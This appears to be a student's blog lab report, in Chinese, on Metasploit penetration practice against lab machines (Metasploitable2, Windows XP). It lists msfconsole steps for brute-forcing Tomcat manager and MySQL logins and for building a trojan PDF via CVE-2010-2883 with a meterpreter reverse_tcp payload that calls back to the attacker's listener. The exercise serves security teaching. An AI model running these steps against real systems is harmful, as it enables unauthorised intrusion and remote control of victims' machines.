实验六 Metasploit攻击渗透实践

1.实验内容及要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

2.实验过程

2.1
利用Hydra在不知道密码的情况下攻击metsploit2靶机,获取密码。






2.2
攻击浏览器,靶机:metsploit2,攻击tomcat
在kali中执行msfconsole,启动metasploit
search tomcat,寻找服务
use auxiliary/scanner/http/tomcat_mgr_login,选择漏洞
set rhosts 192.168.43.57设置要攻击的机器IP
run,
利用成功,得到 shell

先爆破,得到密码
在终端下输入“set RHOST 192.168.92.9”,设置攻击的目标主机IP。 在终端下输入“set RPORT
8180”,设置攻击的目标主机端口号。 在终端下输入“set HttpUsername
tomcat”,设置攻击时使用的登录账号tomcat。 在终端下输入“set HttpPassword
tomcat”,设置攻击时使用的密码tomcat。 在终端下输入“exploit”,开始攻击,建立会话。
获取shell

2.3
PDF 老漏洞 CVE-2010-2883 来进行实践
实验步骤:进入 Kali Linux,使用 Metasploit 生成 PDF 木马文件,search adobe_cooltype_sing
调用渗透模块,use exploit/windows/fileformat/adobe_cooltype_sing
查看模块详情:show options
调用meterpreter载荷,反向连接到渗透机   
set payload windows/meterpreter/reverse_tcp   
设置Kali Linux的IP地址   
set LHOST 192.168.43.110
设置本地监听端口   
set LPORT 2402  
设置带有后门程序的PDF文件   
set FILENAME PINGINGLAB.pdf   
执行渗透生成文件   
exploit
将PDF木马文件拷贝至Kali Linux桌面,并通过一定的方式传送到winxp当中。
Metasploit开启shell监听会话,等待肉鸡上线
使用handler监听模块   
use exploit/multi/handler   
回弹一个tcp连接   
set payload windows/meterpreter/reverse_tcp   
设置监听IP地址(跟PDF木马文件一致)  
set LHOST 192.168.43.110
设置监听的端口(跟PDF木马文件一致)   
set LPORT 2402
开启监听   
exploit
在winxp当中打开。
靶机:winxp+adobe reader 9




成功


2.4
利用辅助模块的扫描功能use auxiliary/scanner/mysql/mysql_login去猜测并且登录mysql
显示模块的有效选项。执行命令如下所示:show options

如果攻击的是别的Mysql那么你只需要设置好这个passfile的路径,username的路径即可,但是本次攻击的对象就是metasploitable2这个靶机,实际上这个靶机的Mysql不需要密码
攻击一下试试看:

posted @ 2022-05-15 15:06  BYTT  阅读(313)  评论(0编辑  收藏  举报